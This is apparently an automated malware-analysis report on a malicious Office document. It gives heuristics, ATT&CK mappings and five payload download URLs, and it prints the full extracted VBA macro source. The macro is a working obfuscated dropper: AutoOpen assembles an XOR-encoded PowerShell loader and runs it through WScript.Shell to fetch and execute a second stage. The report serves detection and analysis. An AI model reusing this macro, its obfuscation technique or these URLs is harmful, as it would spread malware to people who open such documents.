MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell and CreateObject to execute commands, indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_CREATEOBJ' heuristics. The AutoOpen macro suggests an attempt to automatically run malicious code upon opening the document. The script attempts to construct a command string that likely involves 'powershell' and 'wscript.exe', indicating a downloader or dropper functionality.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6600750-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6600750-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb) tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734) qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb) tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734) qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "msbilcAZjT" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://wildpete.com/73v5/ Referenced by macro
- http://www.escoladeemagrecimento.com.br/jl/Referenced by macro
- http://www.southgatetowerquan7.com.vn/aokE/Referenced by macro
- http://www.salinzada.com/4A3bU8Pb/Referenced by macro
- http://www.tomsbigworld.com/VKT9j/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13594 bytes |
SHA-256: 35785d4fb878d2e9da86f724cc3de35b0179316c6a7022ce6716fff3c483562a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
325 of 610 identifiers look randomly generated (e.g. 'drTTsRzRjjC') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bGQHJKU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "msbilcAZjT"
Sub AutoOpen()
On Error Resume Next
zCqEo = 40375 + lBOCU * kpcJi / iCFiCA / KQRqb / qDdMD
JLAZQ = 82535 + PWumn * TUMpq / NzNzCN / NXjaSu / iuLJWD
rXlLI = 1342 + rGJqAA * rTJrY / DXKwUK / viJHdZ / rHtqwd
ZfHOU = 80265 + SWvDz * PLvOwM / cpjwbr / jYICTm / oSGihX
vAoWS = 92992 + TzzLJO * jwKndz / uOskNT / tojQpY / prZIvM
XaslMP = 65353 + CvnCRI * Otwqif / MLPVo / jivMRw / wSjiDH
YKrJY = 78259 + TwuEZ * BmwmFd / ZKRuT / IuHkii / JVDAao
sLzbQc = 35544 + KEjFw * OhVqb / AUzal / bsvMN / bDRAOn
lGcTDksjQ (Qtdlrz + GPMUXw)
MOZYr = 55435 + zTklK * cGcYMW / zAZLzq / ivwOSh / OnbvHz
UoJUCa = 52391 + dDwNVG * rPlls / PvBZR / SjiSWN / hrYjTv
TIIKB = 41923 + Uatnr * ILoNaB / hEWWSd / NTBcE / RdsRA
tdKUoG = 96994 + ZNGjH * FsIul / IDwkcz / ZbTfRq / fllhl
End Sub
Function Qtdlrz()
On Error Resume Next
jnKJLW = 82677 - LEunCu * 55250 + LYlAq - (pOVwQN / fQYNDl - kNfGaC - lkSizj - (awTSn - 77916 - voNFdD + 61301))
bsftb = (KZsRmd + iVjuXr - 55600 / lzpiG * 64822 - LOmWET)
WZwIkQ = sianIE / 58476 / TRiQE - EuPzu + 77526 * SBwzG * Otjqwz * FpsAfs + (ltnzm + WRiiLp)
YZddoC = QJnaf / 38354 / MPCPRC - nZNzM + 60758 * zOzfJ * DfLOL * kBcFNT + (zKBcT + nFkAQj)
cMMZqFPd = "wershe" + "ll " + " " + " " + "&" + Chr(40) + " $" + "Env:" + "COMsPe" + "C[4,24" + ",25]-jOiN" + "''" + Chr(41) + Chr(40) + " -jOi" + "N " + Chr(40) + "'4f65"
KAjGC = GThPn / 56177 / ifaJm - zOfAft + 97293 * iCRjKZ * GzjRa * hwYFvw + (jXHffa + wfAEN)
WiTuqv = zZhDo / 7167 / RVLUAd - hPvmdl + 42096 * Sivhk * BhiOR * TYczoP + (VjZjP + hpSXI)
bcQPj = DDciqr / 23279 / QSGuk - XwGvlD + 69454 * DazfE * NEfJZ * sWEoQ + (TStfZF + QfdWV)
dtpABl = notLm / 94642 / SEBuR - zjRUXB + 82713 * nrkiK * vYDWCD * AiYhs + (kCLiiE + fubUcA)
piCfOtR = "N81p105N" + "29u78L6" + "9L87N1" + "3L79N" + "66p74" + "S69K67" + "f84O0"
SYwRk = FWvWii / 28445 / vAQNK - FQKOBw + 54115 * NdzIE * slLtP * ltnTD + (iLtqHX + MCBOiP)
AzzJdc = ZtBir / 27294 / wEtmfZ - JbNCd + 39642 * AwjuCI * BhPEQ * KIKzr + (Pjqihz + oqYkGz)
MlISZW = GWJpXz / 15770 / MdrLD - QbXVa + 23227 * FqXddb * zkUthV * ojAjZn + (qYWXM + vJkwz)
lAjlM = WRCbIw / 57461 / mbrWmB - iPSBG + 31650 * uqzXu * kbIwo * DVHOPY + (inUSOK + mClNkF)
zQQTD = "f110S6" + "9L84y" + "14u119u" + "69p66N99" + "K76L" + "73O69N7"
XizoO = jPYIa / 8100 / XwFBvB - GkHpR + 58152 * GvGMQ * HiuhX * fuUmwS + (SaqlVL + IOmXJ)
TXMclD = zKSth / 96781 / CbBCdM - OZXlNw + 70958 * qvOiKj * umiUmh * BZjLAj + (jKGtsE + oqXHWP)
kDaTR = KmfsDY / 58378 / VMlwJ - cLaQK + 71414 * vJssX * AAcUB * BIBnh + (NrBzvd + NltYdJ)
jvOdm = jAdKt / 85328 / dHPbYs - wtzvNP + 6907 * mHbwK * nGtYBj * NNqGD + (KGWSAk + MmvTQX)
drTTsRzRjjC = "8O84" + "{27L4" + "u107K114" + "O87f29N7" + "K72{84N" + "84{80" + "K26y1"
ENprvu = dpkoAc / 77354 / YwOYw - VBuWwB + 55443 * OAKBfR * fNFWju * tSnBS + (jVkIIq + LuUzsQ)
XOWiui = qBVCXM / 46120 / fIoJVs - PobNi + 59613 * KaIii * zrIMVB * EBQcY + (dGniG + EUwhG)
bjdwzW = skICPv / 5801 / bjujw - sPBtoj + 55122 * tGdSvr * ooEvA * kcGsvf + (TkEIU + jUcEI)
DIrBYw = Lwmvqo / 90899 / HmvAs - ZRICV + 96406 * IoMjvH * ftahww * EjpNU + (pbhhE + jiqjz)
WvaKbGd = "5L15y8" + "7K73" + "y76y68L80" + "f69p84y69" + "L14y" + "67f79N" + "77O1"
ujOIi = EkjGFU / 49619 / pWLzwS - LfNYJj + 88393 * aYtsr * zDjwR * kktNf + (aaorcB + QjABk)
wEDJa = ujzjO / 23407 / EwkUl - oAYFj + 13978 * fjXToJ * izrPuG * SobJNV + (zSzJF + KDZwX)
IKTIi = bhTrS / 60693 / fJBam - sZITc + 67591 * rnbbwC * aJwRcK * DCGiW + (bWuPJ + Brwzq)
ZmUoGs = PjaVLj / 95875 / wpXBkG - UUsLS + 65464 * EiKHa * XjPvO * GcBBjf + (nCBZz + kCSAv)
RZcvwFmrj = "5L23f19" + "L86p2" + "1K15y96u7" + "2f84K" + "84S80" + "u26f15N15"
BTszmG = wWGwNc / 55056 / qKObI - tFtGw + 64340 * WIiVPs * DXmwVV * liKlF + (HcIzB + vINzrn)
ZMNivL = JuDSa / 53470 / zzuTSI - HuzCFM + 3228 * BFjTAo * tzFqjW * kkbzJ + (kHzhm + SSOcp)
rcObb = kwFSXQ / 10705 / rHajUt - dtAiU + 65498 * VpYuKw * iXDioV * BKkjv + (DBnPXu + OjOwH)
mcPtc = IIJjW / 924 / YMbjPu - mtUBJ + 45826 * vPzJG * ZijmRH * mmtRQP + (WpnzwB + csINkF)
wWpkiwMiE = "N87y87p" + "87O14O69" + "f83y6" + "7p79u76S" + "65u68O6" + "9K69O77p6" + "5p71S82N" + "69N67K73" + "{77L69L78" + "N84N"
ABRlG = MHPLkD / 92502 / tiRVT - UwVvqd + 89091 * cZbpI * fKjwiK * Ucurmc + (Nmsurm + EjVudj)
NtJaQZ = pcpSI / 31635 / AACltj - GczKEs + 93504 * aYjCpZ * krAqkj * zhplz + (sFcqYv + QKPLh)
iqkvuV = jzVmJJ / 99995 / aDEBM - qhjzW + 70842 * dLCFdq * mKwrGz * oXHicp + (FRpcTp + JDwYkG)
mSjfT = jQHNu / 25508 / BJZOtv - XtMdJA + 2635 * GzSVtX * EaDJf * pKchG + (mziki + PitGDV)
uUstmcSYU = "79y14O67f" + "79S77y14" + "{66S" + "82N15N74{" + "76N15N96" + "K72u84L84"
spPsG = dttmDj / 5363 / Qbciwn - GCowcQ + 27988 * cbzCb * zvuoF * AjpwaS + (CFRqk + Mmmau)
IDKKu = TDAEw / 21499 / Pnijkv - lOdcN + 77078 * ioIwXh * WAizhJ * KmufZu + (bAKVH + jtZhz)
KPjQKG = bWSfiu / 84099 / saNsXK - MELlNt + 27415 * KVzLvf * Piqtr * jajwsQ + (LZiWS + DfFZt)
NsHKii = MbKiBi / 36304 / cdbpUc - Slmdsh + 55130 * KFzFdF * QAOwDs * rjsAP + (BdkYLT + WXFpP)
oCVbwLf = "u80K26" + "S15f15u8" + "7S87f87y1" + "4O83p79" + "{85f84f7" + "2N71{6" + "5L84p69L" + "84y79{87" + "S69S82N" + "81y85" + "u65{78p23"
LvUfBr = wQfdQ / 65278 / bwiLYH - Ycbbci + 71307 * jFwojL * TWHIhT * wnDOEH + (qwHXl + SsEZJU)
pAdEYp = ANbaYY / 2868 / tFksR - kjUYt + 20308 * FtvZjT * AOcTK * aoCJA + (RHcRUw + iEUIfi)
kajbBi = cHEQaZ / 64095 / oXOddq - IpRuXN + 53088 * iwMUH * HbMVL * isqzMG + (EhKfqI + RqKGKi)
oVRNE = JjvBIS / 21844 / QwUiR - XlXSWL + 26090 * QRGLd * uXZjHf * XlIXYz + (BrpYtH + CzwrtM)
wEUqXjrocQ = "L14K67" + "f79u77p1" + "4y86f" + "78y15u" + "65L79N" + "75f101" + "L15S9" + "6S72" + "S84p84" + "K80y" + "26K15N15{" + "87N87"
jVTzs = SYtrC / 37965 / wCvGW - KLXoqW + 97320 * iZOGwv * jDoSM * oljLjk + (jiDlii + HJhdd)
Qdvwo = NsZkal / 95386 / zPuzO - EYbhRV + 1208 * ZasOTZ * IMajQ * ISEwH + (dDiEt + lzsBOi)
bkwflD = zOzHn / 20618 / VZncKl - DAVcb + 38014 * IaVLpS * EmEac * iRiww + (hwhWE + rbYkc)
Jjwoo = vwsmRm / 66370 / hYllR - iHmdb + 8382 * szrmT * CRsQt * EAzbvj + (nCkTpm + DYBzS)
bMtEE = "y87p14K" + "83{65y" + "76N73O" + "78S90S" + "65O68S65f" + "14p67p79N"
Qtdlrz = cMMZqFPd + piCfOtR + zQQTD + drTTsRzRjjC + WvaKbGd + RZcvwFmrj + wWpkiwMiE + uUstmcSYU + oCVbwLf + wEUqXjrocQ + bMtEE
WCVuKL = UajGw / 26852 / JwMSC - vbktn + 54041 * btCbZt * wEwBBm * kDNPK + (TJBiE + jAuScG)
jMCBB = zcjkp / 15506 / HMYijq - jQOHiB + 98836 * GdPuz * uszwau * SHRvLw + (FitVGV + SwuXAB)
NlaXEj = bRFAK / 34387 / CKYWd - UfSsUX + 54617 * lCmTu * ZfJfI * HjBEBY + (hiqWvw + NiTiDh)
qqPTj = wqWAs / 26740 / VndOrv - vivjqV + 31481 * rMbcb * RqmkUH * qIpdhE + (ZEFrH + IHujcL)
End Function
Function GPMUXw()
On Error Resume Next
wGrtCo = OhDMc / 82291 / NaCCYd - AhScG + 41783 * NOfftZ * owLaZ * FlusF + (sHUpLn + avZZRv)
twKZQ = ODzqdX / 78052 / EaGCIQ - fmGjU + 60645 * JvCII * trzPN * pEcNcU + (wEhoh + vsOME)
jBSXj = RWYcrc / 98521 / KOmaX - cjsYU + 85602 * wWPYt * HaDTWL * jWirw + (nEQjnz + lpAItD)
QSAJDw = ruGvPO / 2260 / GwBalE - hpcZw + 87251 * auZTX * NVZnz * wJKkXl + (IiCHSR + ClKhiz)
sWXrIYnYwE = "77u1" + "5p20K97{1" + "9N66p11" + "7O24{" + "112L66f" + "15N96S72" + "L84y" + "84f80K" + "26f15u15"
snZfE = TlOZqd / 88545 / rlutO - NFPGQT + 11721 * jtZwj * FFYzpR * pjnOwv + (cEBfBJ + mYSPlU)
ZULWw = vPkYNb / 1049 / EXFEo - kjYmG + 3547 * DcLsJA * WpwOau * tzdtrQ + (zNFcpu + qvYQu)
FVAsz = BlNwD / 94968 / XWbrRX - lbstw + 43173 * ThFiD * sjNnWA * lqrEbE + (RPwaw + BTicH)
bziEHO = BuoIo / 41846 / dhuko - szlDk + 59755 * quYFlj * ZuDmjp * DccHIE + (kTZtnp + bNiTc)
KlOrBuODH = "K87S" + "87N8" + "7L14{84N7" + "9f77p83" + "N66S7" + "3L71O" + "87K7" + "9p82u7" + "6y68" + "N14p67p7" + "9f77{15f"
tBFot = XrRPLb / 31576 / EliSJ - IucpbE + 65927 * SkULi * vzjdzz * WmpXQl + (ztnFP + PzZPMo)
JGVjWI = riiHAz / 80273 / XIvbaC - bzLzq + 44284 * hYTHKR * GtkAJp * pRsoz + (DEirC + EfVYZR)
KZjuA = fRECFT / 18856 / mHnSL - TOYzP + 91298 * VwaTQ * sRwGu * YGzur + (mGLdsl + BVnvAi)
EjJVii = JQzpAt / 91985 / MWThPc - zsDoWO + 77859 * VvYOS * zcQIsd * NossBO + (RcTSD + mRRpL)
WkkzusEGC = "118S10" + "7u116" + "p25N74{1" + "5f7O14u11" + "5O80{7" + "6S73p84y8" + "y7L96u" + "7f9K27" + "u4f87"
Uazhj = bEqWwJ / 91845 / wkjRTi - HozTE + 64866 * sSGEd * twRNnw * qMsHD + (KqpGF + iLMmA)
ULbtcf = wOuCYX / 99231 / jELwV - iotcF + 21303 * BjKbz * IdmuP * XPvXZ + (vDODMG + papWiR)
ftSLY = sjCpB / 36064 / iVOTv - pQtXRD + 23290 * quhjK * zHEAf * cPWIVp + (kbsUs + qKzmW)
IMOBl = IrBWW / 33378 / oGTat - Ccjbaz + 50495 * PTGBVh * WcONkn * wVOEb + (DKXkD + UYcko)
FsDYVHzbZ = "f102O" + "100p0L" + "29{0" + "p7S22f17N" + "19S7K27{" + "4p82f9" + "9L65{" + "29{4f" + "69K7" + "8K86L"
bYWhWn = nfEjq / 45237 / lSTic - YizDR + 66003 * cTHahO * zBXUUD * smSKM + (sjFwD + tQzZT)
LftXv = BjOSi / 10075 / JwqdL - WWUlE + 92797 * wUMat * ZIZHSa * tCrrlf + (WuCiv + YSirt)
oIwUX = CctDjv / 98308 / Ynjrh - EbnwOJ + 44585 * UNCcE * fvQYP * IkNpwJ + (tqGjFr + MNVzGN)
jHjAH = vicWIb / 86306 / TOwzEK - bOdwkd + 84670 * aQRBi * djooR * PNjbi + (qszWzB + cItCD)
IEijWilum = "26O84p" + "69K77" + "L80N" + "11u7S124" + "K7S1" + "1u4K87L10" + "2K100O1" + "1f7O14S" + "69K88O69" + "{7p27K70L"
bFuHCZ = jELCAS / 26352 / GzBqcB - rWUiz + 62881 * zLMoKd * kuOouf * DrOhXm + (FqIMY + OYnYZM)
OCLCF = ZKLqhJ / 21752 / GOOiCS - mzTDQQ + 97016 * QjikR * BDLdk * nfBRN + (OzOuPz + lcDswp)
HzpMH = PWCmCh / 43095 / oiFzb - FsUEbl + 6391 * LHqOi * lDBCa * XzCEFf + (Rauhb + TDPflk)
jvKvv = zzXkcD / 44050 / WGpPww - mtRaPQ + 28731 * WXQRE * bpHIR * CtpRdE + (wzZPm + luCsUf)
DaCMhadbqj = "79f82N6" + "9K65" + "O67y72" + "O8O4u106" + "f82N" + "77y0N73" + "S78K0f4N"
HwVWUv = nULAbv / 7606 / cRqEA - GPJbE + 27393 * bdMmY * lnGfL * dRCsBW + (UupATA + IAjMu)
kjBMM = ShvQhH / 63837 / hsEAw - FSWwI + 58240 * TLZwmc * vWrcEs * cBjsIF + (ECwrY + SRJFE)
jVLrw = CZSmW / 72539 / HWHEWH - ItNmc + 86759 * VNkDuk * QHFLun * WBITP + (tjBvNE + GnIZOF)
hLijbB = rOBtcU / 69784 / sFTNEs - Moppuq + 56068 * jwoLmK * ZrNGC * zClkG + (uCGAB + tzttmH)
qhzcIImjBp = "107{1" + "14N87u9O" + "91O84u82S" + "89u91L4f" + "65p81" + "O105S14u" + "100f" + "79{87y" + "78K76p79" + "S65N" + "68S102u73"
EQzzWs = BTjhGd / 60618 / Mauuii - YRqXn + 86656 * lhDzu * cWWII * rEDaj + (nsTrB + Rwirh)
OOVznI = bYfbzz / 81127 / MmDFn - izZvm + 53700 * LZjFGO * DdFzbI * VWiBDt + (mHphT + fRwBA)
wFpth = dIibB / 80532 / mlNrR - rHTAA + 78781 * fwfwVk * NJDfwW * zaVMq + (nPWEHQ + qCfEo)
nVhdl = RBpch / 64525 / vTujwn - LGQaa + 79487 * OwLiw * tijQzj * Zczmo + (OUCwV + RdthFG)
jUzzuwGP = "u76u69p8" + "K4{106L82" + "K77{12N0f" + "4K82S99y" + "65y9{" + "27N115f8" + "4N65L" + "82K84K1" + "3L112" + "u82u79S" + "67S69{83"
cwLMU = abOJoq / 60711 / MczjE - zVqczn + 92158 * qjYim * EPwCz * sIdAkl + (bJntRk + DHIjM)
wACCi = iqzMnd / 68495 / hliId - EbkMCp + 94586 * NABaJu * GWZTnF * OIPSlS + (sKZbVw + PqAoB)
tIkikK = aTwfu / 73068 / mprpr - zUIDn + 14627 * PBwHNp * DjXvQ * hPHMHw + (dkNQTr + iYzhud)
oYWpR = UDDRv / 48141 / hiNvv - cQiojn + 42143 * iijqAn * sqlXp * KZhvUu + (RzLElF + zKkqB)
mtwFZ = "y83f0K4p8" + "2u99u65S2" + "7O66L8" + "2L69O65u" + "75p27N9" + "3O67O65" + "y84u" + "67L72L91{"
zzvFn = BLPuri / 46520 / kbzbkz - lEDVN + 31929 * tsTvZ * aJYXTC * UunQiU + (XZqdUp + OurjaQ)
NmYTbu = GoscXF / 91679 / rwsLt - aiTfEv + 74308 * iFuWt * XAOUZI * dHjjf + (iHNsi + AnEFo)
SXbwIa = bCZHi / 39534 / rRnqt - qTBqa + 70617 * LOhotl * BWLUWt * wXQVmU + (XdDshs + wVlVXb)
MUlNw = DUFTUz / 84309 / wlUoQG - livMtt + 4886 * ZwwSj * CfIprq * XkYhA + (CkRhH + LbqqA)
VpjAmSd = "93N93'" + ".SpLIt" + Chr(40) + "'S" + "NKOLp" + "fyu{'" + Chr(41) + "|" + " % {" + " [ChaR" + "] " + Chr(40) + " " + "$_ -Bxo" + "r " + Chr(34) + "0x" + "20" + Chr(34) + Chr(41) + "} " + Chr(41) + Chr(41)
GPMUXw = sWXrIYnYwE + KlOrBuODH + WkkzusEGC + FsDYVHzbZ + IEijWilum + DaCMhadbqj + qhzcIImjBp + jUzzuwGP + mtwFZ + VpjAmSd
fkqzh = ENSaC / 42566 / UfDtrk - hHruv + 29867 * laLof * JWPww * OBWQfY + (RzqGCJ + WYXtw)
kATjV = hLItF / 22898 / ZPlNtW - soAQHQ + 81767 * UJMpHl * pjrOC * ovIfF + (iFaNwT + KvADY)
RuTmG = WCVwPF / 92421 / WBKrM - EwWuT + 18157 * MzlwWB * JTijJu * ovAbB + (twUNj + awTYYS)
FJFkzt = CGCSb / 64275 / UQCVT - DlQcY + 34343 * bvpvJR * oriLB * zDntBl + (PFiRDE + tUtdMh)
End Function
Attribute VB_Name = "kMGQLqGH"
Function lGcTDksjQ(cqXUlPIviPO)
On Error Resume Next
CCrFDm = (NulNh - PwwCms + pkPLd * hwIMkA)
PoiEip = (ZroQZi - ippFr + GbJbG * zhYmti)
cDqjmT = (GMpwtL - AiWAAQ + rofGz * rzAEvh)
ifwqR = (OOuzCR - BXuww + DOnRm * cOEDEh)
UtFXL = (AwXGTA - YoCjmY + GPLuw * phXQJ)
MUMjw = (kpiEu - NuEnKD + OSzwv * LKphJ)
pPBED = (nwqNcY - siZmX + uAvTjP * RWmzu)
SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)
zahUU = (PcYcu - sRScYw + JdITpT * jdjUvE)
QvBlZ = (KzKbw - XMPrwV + TScoG * AUomwE)
suktZ = (WafIJ - jkEiV + OFmFu * OXwaZR)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.